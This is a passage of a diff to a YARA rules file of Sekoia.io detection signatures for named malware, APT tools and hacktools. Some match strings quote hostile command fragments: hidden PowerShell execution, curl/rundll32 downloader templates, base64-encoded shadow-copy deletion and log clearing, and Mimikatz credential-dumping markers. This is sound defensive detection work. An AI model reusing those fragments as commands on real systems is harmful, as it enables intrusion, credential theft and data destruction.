-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_dcrat_qwqdanchun.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e6f8664e57ecce3bd7b2af5c67d564d526b32d12218b772b0e9f53709044e14d"
-		score = 75
-		quality = 80
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustang_panda_nupakage.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "255c77af714b1b66275f3973fb112994ccb028d5d60562bbde30df5a761f03d3"
+		score = 50
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "DcRatByqwqdanchun" wide
-		$str02 = "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==" wide
-		$str03 = "Po_ng" wide
-		$str04 = "Pac_ket" wide
-		$str05 = "Perfor_mance" wide
-		$str06 = "Install_ed" wide
-		$str07 = "get_IsConnected" ascii
-		$str08 = "get_ActivatePo_ng" ascii
-		$str09 = "isVM_by_wim_temper" ascii
-		$str10 = "save_Plugin" wide
-		$str11 = "timeout 3 > NUL" wide
-		$str12 = "ProcessHacker.exe" wide
-		$str13 = "Select * from Win32_CacheMemory" wide
+		$s1 = "D:\\Project\\NEW_PACKAGE_FILE\\Release\\NEW_PACKAGE_FILE.pdb" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Downloader_Win_Search : FILE
+rule SEKOIA_Apt_Gamaredon_Ddrdoh_Powershell_Backdoor : FILE
 {
 	meta:
-		description = "'Search.exe' script used by APT42"
+		description = "Detects GAMAREDON's DDRDOH PowerShell Backdoor"
 		author = "Sekoia.io"
-		id = "8094ddda-6294-4dee-93cb-de79aaed1ec6"
-		date = "2024-08-23"
+		id = "3413dedd-e3ec-4231-8af7-c7f709ab82d7"
+		date = "2023-01-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_win_search.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "a29fa85ecfc0e5554c21f3b9db185de97b3504517403f4aa102adbd2c46dc1bf"
-		hash = "f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060"
-		logic_hash = "1b25f04d1d2c9b7bdc7e0bd17d2f2876c27f9c4acb3a2afca6a4df531e769740"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_ddrdoh_powershell_backdoor.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "32d088affb65d410b2715fde28227792ea9f406e324de4a2e204e9850f0b81ce"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248798,90 +249314,86 @@ rule SEKOIA_Downloader_Win_Search : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "C:\\Users\\pc\\source\\repos\\Search\\Search\\obj\\Debug\\Search.pdb"
+		$ = "hidden iex $env:" ascii wide
+		$ = ".substring(0,4) -eq \"http" ascii wide
+		$ = ".split('!')[1];" ascii wide
+		$ = " -bxor $key[$i % $key.Length]" ascii wide
+		$s = "Filter $fil | Select-Object VolumeSerialNumber" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint8( 0 ) == 0x24 and 4 of them and filesize < 10KB
 }
-rule SEKOIA_Infostealer_Win_Grmsk_Strings : FILE
+rule SEKOIA_Apt_Toddycat_Toddybox_Strings : FILE
 {
 	meta:
-		description = "Finds GrMsk samples based on the specific strings"
+		description = "Detects ToddyCat's ToddyBox binary"
 		author = "Sekoia.io"
-		id = "58f32339-5e0f-405c-9acc-14b93f6c208b"
-		date = "2023-11-30"
+		id = "fde3df24-ebd7-4327-998e-bddaa08835da"
+		date = "2023-11-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_grmsk_strings.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a2f638556edf5b2cabcd67e7d29a9e3f554b707af688f79b89f2f67d493093b3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_toddycat_toddybox_strings.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b71fad12d4485268cbeff98b8a8d6067ac8f62164be60cdb61f3f37ab471a247"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "ref.txt" ascii fullword
-		$str02 = "--------" ascii fullword
-		$str03 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.834.0 Mobile Safari/5362" ascii fullword
-		$str04 = "POST" ascii fullword
-		$str05 = "\\SearchWallet\\" ascii
-		$str06 = "1234niwef" ascii
-		$str07 = "afbcbjpbpfadlkmhmclhkeeodmamcflc" ascii
-		$str08 = "lodccjjbdhfakaekdiahmedfbieldgik" ascii
-		$str09 = "wallets" ascii
-		$str10 = "config" ascii
-		$str11 = "\"recently_open\": [" ascii
-		$str12 = "\"gui_last_wallet\": " ascii
-		$str13 = "YUOhtyugjKgdfgjFGghj676jj" ascii
+		$ = "Wait a while to upload the next file..."
+		$ = "[-] Error Msg: %s"
+		$ = "[-] Error Msg: Connect Errors or Proxy Errors"
+		$ = "[-] arg missing!"
+		$ = "[-] Get module dir failed!"
+		$ = "[-] Dir error!"
+		$ = "Auto Get Proxy %S"
+		$ = "Dropbox-API-Arg"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Apt28_Document_Phishing_Webpage : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc_Settings_Xml : FILE
 {
 	meta:
-		description = "Detects APT28 document phishing webpage"
+		description = "Detects some suspected APT28 document settings.xml"
 		author = "Sekoia.io"
-		id = "585a8e23-c302-41d3-938f-eda60c82ef28"
-		date = "2024-04-08"
+		id = "fd104985-6441-4fb6-8cc1-30afa4a7797b"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt28_document_phishing_webpage.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b64888c1d8568cf9d8f4dfcd2e18093db8635966d88abaa368dc46a1e4453782"
-		score = 75
-		quality = 80
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_susp_apt28_uac0063_malicious_doc_settings_xml.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a"
+		logic_hash = "29b40a83340e71bfc38dc7050b3a21e62e2d2e506dbd077c1c7e430c8ff56d32"
+		score = 65
+		quality = 30
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "webhook.site"
-		$ = "document.createElement('img')"
-		$ = "brightness(15%) blur(7.0px)"
-		$ = "This document is not available from mobile devices."
-		$ = "Capture2.PNG"
-		$ = ">CLICK TO VIEW DOCUMENT<"
-		$ = "window.location.href = 's"
-		$ = ".oast."
+		$ = "http://schemas.openxmlformats.org/" ascii fullword
+		$ = "Call svc.GetFolder(" ascii fullword
+		$ = "CreateTextFile(appdir" ascii fullword
+		$ = "Sub Document_Open() : On Error Resume Next" ascii fullword
 
 	condition:
-		4 of them and filesize < 20KB
+		2 of them and filesize < 1MB
 }
-rule SEKOIA_Backdoor_Lin_Sysupdate : FILE
+rule SEKOIA_Hacktool_Win_Uknowseckeylogger : FILE
 {
 	meta:
-		description = "Detect the SysUpdate malware"
+		description = "Detect the uknowsec keylogger based on strings"
 		author = "Sekoia.io"
-		id = "9cb806cf-4ca1-44d8-809a-58cc5f364fb8"
-		date = "2023-03-01"
+		id = "ab08136d-b1f3-4e64-b73c-e6344b610f91"
+		date = "2022-10-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_lin_sysupdate.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "93e17cd535444e9cabc7440b1226526e67ddb81a84eb6377689a62f268b9dfee"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_win_uknowseckeylogger.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "83a731a5b1853edcce963d458fc170206086305f3e43403c930c9633918e8ff1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248889,28 +249401,28 @@ rule SEKOIA_Backdoor_Lin_Sysupdate : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "generate guid path=%s"
-		$ = "3rd/asio/include/asio/detail/posix_event.hpp"
-		$ = "expires_at"
-		$ = "%s -f %s"
-		$ = "expires_after"
-		$ = "-run"
+		$str0 = "github.com/atotto/clipboard" ascii
+		$str1 = "github.com/TheTitanrain/w32" ascii
+		$str2 = "github.com/aliyun/aliyun-oss-go-sdk" ascii
+		$str3 = "golang.org/x/sys" ascii
+		$str4 = "golang.org/x/time" ascii
+		$str5 = "WSARecvWSASend[Print][Right][Shift][Sleep][debug][error]" ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Subtle_Paws : FILE
+rule SEKOIA_Apt_Sandworm_Awfulshred_Obfuscation_Apr2022 : FILE
 {
 	meta:
-		description = "SUBTLE-PAWS powershell backdoor used by Gamaredon"
+		description = "Detects the AWFULSHRED wiper used by Sandworm"
 		author = "Sekoia.io"
-		id = "1950f886-97d2-4aa1-8f13-2947eba706e4"
-		date = "2024-02-09"
+		id = "52317e6b-7f2c-4c2a-bcfc-ebb4ab4c728e"
+		date = "2022-04-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_subtle_paws.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "2fcebcf3401912e06ca4a34bf4e8d5318c6b2e08b00c4939ab932f3fb94cbc89"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sandworm_awfulshred_obfuscation_apr2022.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3e1eed3a4b638893828289f928a75b855bc9e1e29444ffa81c0461fdc1277cad"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248918,53 +249430,71 @@ rule SEKOIA_Apt_Gamaredon_Subtle_Paws : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "$splitter" ascii wide
-		$s2 = "[System.Convert]::FromBase64String" ascii wide
-		$s3 = "$_;$var2 =\"var1\";$var3" ascii wide
-		$s4 = "foreach-object{$_|powershell -noprofile -}" ascii wide
+		$h = "#!/bin/bash"
+		$s = { 64 65 63 6c 61 72 65 20 2d 72 20 [8] 3d }
 
 	condition:
-		$s1 and $s2 and ( $s3 or $s4 ) and filesize < 100KB
+		$h at 0 and #s > 15
 }
-rule SEKOIA_Apt_Flightnight_Malicious_Lnk : FILE
+rule SEKOIA_Apt_Apt33_Falsefont : FILE
 {
 	meta:
-		description = "Detects malicious LNK used by FlightNight"
+		description = "FalseFont backdoor"
 		author = "Sekoia.io"
-		id = "06f33ece-ac9f-4dd3-98fb-cd69305ee995"
-		date = "2024-04-02"
+		id = "d77c1f5b-9898-456f-954a-ac1f0907a2ba"
+		date = "2024-03-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_flightnight_malicious_lnk.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3446852709fe425b2c053ffdb9c078cf20e442ef50fe20402d3b4c9e9d8b543a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt33_falsefont.yar#L1-L38"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "2eafe15d8e0df1b63b32463c4b44a9dc1d4251d01c15be20e4285c31e75b8348"
 		score = 75
-		quality = 80
+		quality = 53
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "/c start /B " wide
-		$s1 = ".exe &" wide
-		$s2 = ".pdf" wide
-		$s3 = "%CD%" wide
+		$s0 = "Agent.Core.WPF"
+		$s1 = "data2.txt" wide fullword
+		$s2 = "data.txt" wide fullword
+		$s3 = "Loginvault.db" wide fullword
+		$command1 = "ExecUseShell" ascii
+		$command2 = "ExecAndKeepAlive" ascii
+		$command3 = "CMD" ascii
+		$command4 = "PowerShell" ascii
+		$command5 = "KillByName" ascii
+		$command6 = "KillById" ascii
+		$command7 = "Download" ascii
+		$command8 = "Upload" ascii
+		$command9 = "Delete" ascii
+		$command10 = "GetDirectories" ascii
+		$command11 = "ChangeTime" ascii
+		$command12 = "SendAllDirectory" ascii
+		$command13 = "UpadateApplication" ascii
+		$command14 = "Restart" ascii
+		$command15 = "GetProcess" ascii
+		$command16 = "SendAllDirectoryWithStartPath" ascii
+		$command17 = "GetDir" ascii
+		$command18 = "GetHard" ascii
+		$command19 = "GetScreen" ascii
+		$command20 = "StopSendScreen" ascii
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and $s1 in ( @s0 .. @s2 ) and $s1 in ( @s0 .. @s0 + 100 ) and $s3
+		uint16be( 0 ) == 0x4d5a and 15 of ( $command* ) and 3 of ( $s* )
 }
-rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Downloader : FILE
+rule SEKOIA_Hacktool_Lazagne_Strings : FILE
 {
 	meta:
-		description = "Detects VHD ransomware downloader"
+		description = "Detects LaZagne hacktool based on strings"
 		author = "Sekoia.io"
-		id = "edcc9df8-650c-437a-adb8-a671e8b75e64"
-		date = "2022-11-28"
+		id = "5a5e7a07-1252-48cc-ada5-46e796c4e00e"
+		date = "2022-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_vhd_ransomware_downloader.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "042ab0029d170937af9b9ee6a8e499843532c84cf99faed3d2d47cb18a1500ac"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_lazagne_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a6db351fee9a28b1a6d82c2ce063088a1050ee8379cc13ca3cf8cc2038043951"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248972,27 +249502,29 @@ rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Downloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "rundll32.exe %s #1 %S" wide
-		$ = "cmd /c timeout /t 10 & Del /f /q \"%s\" & attrib -s -h \"%s\" & rundll32 \"%s\" #1" wide
-		$ = "cmd /c timeout /t 10 & rundll32 \"%s\" #1" wide
-		$ = "curl -A cur1-agent -L %s -s -d da"
-		$ = "curl -A cur1-agent -L %s -s -d dl"
+		$w1 = "lazagne.softwares"
+		$w2 = "pypykatz.lsadecryptor"
+		$l0 = "PyModule_GetDict"
+		$l1 = "softwares.sysadmin.filezilla"
+		$l2 = "softwares.walle"
+		$l3 = "softwares.databases.sqldeveloper"
+		$l4 = "softwares.wifi.wpa_supplicant"
 
 	condition:
-		filesize < 2MB and 3 of them
+		( uint32be( 0 ) == 0x7f454c46 and all of ( $l* ) ) or ( uint16be( 0 ) == 0x4d5a and all of ( $w* ) ) and filesize < 40MB
 }
-rule SEKOIA_Tool_Dogtunnel_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Lnk : FILE
 {
 	meta:
-		description = "Detects Dog Tunnel based on strings"
+		description = "Detects lnk file used by Gamaredon"
 		author = "Sekoia.io"
-		id = "00705613-6367-454f-b3f2-1e2b0a52459c"
-		date = "2024-03-14"
+		id = "bfa69d84-433c-4f37-93b7-5b1b11677fbb"
+		date = "2024-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_dogtunnel_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "04e7141e67ba841b0955b9e36c43be1f5b22e635b96d58b8b1b52fd507ddd929"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_lnk.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "be73ffca4b88f11e33532cf9a179743508bfa7a60c6f4de98c245b350b5fb910"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249000,58 +249532,58 @@ rule SEKOIA_Tool_Dogtunnel_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "pipe.(*UDPMakeSession).doAndWait"
-		$ = "ikcp.ikcp_parse_fastack"
-		$ = "pipe.ListenWithSetting"
-		$ = "pipe.DialTimeoutWithSetting"
-		$ = "common.ReadUDP"
+		$s1 = "-windowstyle hidden $(gc " wide
+		$s2 = "|out-string)|powershell -noprofile -" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them and filesize < 10MB
+		uint32be( 0 ) == 0x4c000000 and any of them and filesize < 100KB
 }
-rule SEKOIA_Clipper_Win_Atlas_Strings
+rule SEKOIA_Ransomware_Win_Redeemer : FILE
 {
 	meta:
-		description = "Detects Atlas Clipper"
+		description = "Finds Redeemer samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "f08c6af6-c325-4f7d-8686-575b25550d6a"
-		date = "2023-07-10"
+		id = "ef94c1b0-d292-4fae-9801-4860e7347745"
+		date = "2022-12-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/clipper_win_atlas_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c8ad062b69dfe996a488ee9c79f0e7e0016f57f5b54fc39aeb4e207d2a42aa75"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_redeemer.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c1798a18e763277d19a3b698459244a2bc2eeebbbf239db7540d1493955ce5f0"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "C:/Users/box/Desktop/ATLAS/ATLAS/main.go" ascii
-		$s2 = "ATLAS Clipper" ascii
-		$s3 = "Victim: %s" ascii
-		$s4 = "Attacker: %s" ascii
-		$s5 = "Install Path: %s" ascii
-		$s6 = "HWID: %s" ascii
-		$s7 = "Install Date: %s" ascii
-		$s8 = "https://t.me/atlasclipper_channel" ascii
+		$str0 = "RedeemerMutex" ascii
+		$str1 = "SOFTWARE\\Redeemer" ascii
+		$str2 = "-----BEGIN REDEEMER PUBLIC KEY-----" ascii
+		$str3 = "dnNzYWRtaW4gZGVsZXRlIHNoYWRvd3MgL0FsbCAvUXVpZXQ=" ascii
+		$str4 = "d2V2dHV0aWwgY2xlYXItbG9nIEFwcGxpY2F0aW9u" ascii
+		$str5 = "d2JhZG1pbiBkZWxldGUgc3lzdGVtc3RhdGViYWNrdXAgLWRlbGV0ZW9sZGVzdCAtcXVpZXQ=" ascii
+		$str6 = "YXNzb2MgLnJlZGVlbT1yZWRlZW1lcg==" ascii
+		$str7 = "UmVkZWVtZXIgUmFuc29td2FyZSAtIFlvdXIgRGF0YSBJcyBFbmNyeXB0ZWQ=" ascii
+		$str8 = "redeemer\\DefaultIcon" wide
+		$str9 = "\\Redeemer.sys" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule SEKOIA_Apt_Cloudatlas_Powershower_Module : FILE
+rule SEKOIA_Apt_Cottonsandstorm_Win_Implant : FILE
 {
 	meta:
-		description = "Detects CloudAtlas PowerShower module"
+		description = "Detects a simple win implant used by Cotton Sandstorm"
 		author = "Sekoia.io"
-		id = "dd688058-3d5d-46a7-8380-fe961c3327cd"
-		date = "2022-11-30"
+		id = "04a5255c-f9bb-4612-b0e2-ed0326867055"
+		date = "2024-11-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_powershower_module.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7542eb882ee44203d806ad936126be2476b6e3a85ad8c93b6fd6c8226fe82617"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cottonsandstorm_win_implant.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "f797d71ed07d6e05556300e4ce0f2927"
+		logic_hash = "dcb25ee236ca52f23cc6bfdbcedcbc6d407e88f06341e684f202a59954733ade"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249059,26 +249591,30 @@ rule SEKOIA_Apt_Cloudatlas_Powershower_Module : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$env:temp" ascii wide
-		$ = "foreach($item in $zip.items" ascii wide
-		$ = "echo $result" ascii wide
-		$ = "pass.txt" ascii wide
+		$ = "DIR =>" wide
+		$ = "type=machines&md5=" wide
+		$ = "File =>" wide
+		$ = "&ip=" wide fullword
+		$ = "&un=" wide fullword
+		$ = "&cp=" wide fullword
+		$ = "myFile\";filename=" ascii
+		$ = "ifB75BcjsRBhy2et" ascii
 
 	condition:
-		all of them and filesize < 10000
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
 }
-rule SEKOIA_Tool_Rathole_Strings : FILE
+rule SEKOIA_Hacktool_Mimikatz_Obfuscated : FILE
 {
 	meta:
-		description = "Detects RATHole based on strings"
+		description = "Detects Mimikatz on strings obfuscation"
 		author = "Sekoia.io"
-		id = "39d11285-a3bf-46c3-901d-ab46601a9066"
-		date = "2024-05-23"
+		id = "bac4bb61-d250-4fc3-95a5-edd4e3c7ff83"
+		date = "2022-07-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_rathole_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f7c42328a38b2c101ea2d179b6adf9cf3d842d9e1c91e85fc6e684ee4f82458f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_mimikatz_obfuscated.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9f75e10122df0f57382e939d82b0ab4047d3d42f198c59faa22177d6d5d9afd7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249086,56 +249622,64 @@ rule SEKOIA_Tool_Rathole_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "rathole\\src\\" ascii
-		$ = "\\\\?\\\\\\?\\UNC\\" wide
-		$ = "rathole::" ascii
-		$ = "src/server.rs"
-		$ = "`[server]` or `[client]"
+		$xor1 = "Benjamin Delpy" xor
+		$xor2 = "sekurlsa" xor wide
+		$xor3 = "minidumpfile.dmp" wide
+		$xor4 = "lsadump_dcsync" xor wide
+		$xor5 = "kuhl_m_lsadump_getSamKey" xor wide
+		$b1 = "Benjamin Delpy" base64
+		$b2 = "sekurlsa" base64 wide
+		$b3 = "minidumpfile.dmp" base64 wide
+		$b4 = "lsadump_dcsync" base64 wide
+		$b5 = "kuhl_m_lsadump_getSamKey" base64 wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint32be( 0 ) == 0xCFFAEDFE ) and 3 of them
+		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 5MB
 }
-rule SEKOIA_Unknown_7777_Xlogin : FILE
+rule SEKOIA_Infostealer_Win_Stealc : FILE
 {
 	meta:
-		description = "Detects the xlogin bind shell and its variants"
+		description = "Find standalone Stealc sample based on decryption routine or characteristic strings"
 		author = "Sekoia.io"
-		id = "ce0beffc-f957-43ef-a739-f4a1099a7a67"
-		date = "2024-07-18"
+		id = "aa78772e-9b31-40f3-84f4-b8302ea63a28"
+		date = "2023-02-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/unknown_7777_xlogin.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "4d9067e7cf517158337123a30a9bd0e3"
-		hash = "43ea387b8294cc4d0baaef6d26ff7c72"
-		hash = "777d6f907da38365924a0c2a12e973c5"
-		hash = "8542a3cbe232fe78baa0882736c61926"
-		logic_hash = "1c38d8019734affdebac32050097bbcf89e9069fb2145a976588eca04ecc78df"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_stealc.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "60140c5a97494e6648dfce719ebce5644a3e05d4559d28874eb759b7d0e6a90e"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
